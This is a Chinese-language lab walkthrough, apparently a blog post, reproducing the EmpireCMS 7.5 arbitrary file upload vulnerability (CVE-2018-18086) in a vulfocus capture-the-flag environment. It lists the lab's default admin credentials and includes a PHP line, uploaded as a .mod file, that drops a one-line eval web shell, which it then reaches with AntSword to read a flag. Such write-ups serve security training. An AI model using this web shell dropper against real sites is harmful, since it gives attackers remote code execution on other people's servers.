vulfocus-empirecms 文件上传 (CVE-2018-18086)漏洞复现详细教程
关于本地化搭建vulfocus靶场的师傅可以参考我置顶文章
KALI搭建log4j2靶场及漏洞复现全流程-CSDN博客
https://blog.csdn.net/2301_78255681/article/details/147286844
一、漏洞描述:
EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:admin/123456 后台路径:/empirecms/e/admin
二、漏洞复现:
1、来到vulfocus镜像管理界面,下载靶场环境,也可以在vulfocus官网直接启动靶场环境
Vulfocus 漏洞威胁分析平台https://vulfocus.cn/#/dashboard
2、来到后台页面
3、登录进入后台,账号密码admin/123456
4、寻找发现文件上传地点
5、导入木马文件666.php.mod,使他创建一个caidao.php的木马文件
<?php file_put_contents("caidao.php","<?php @eval(\$_POST[cmd]); ?>");?>
6、访问是否上传成功
7、使用蚁剑测试连接
8、在tmp目录下成功找到flag
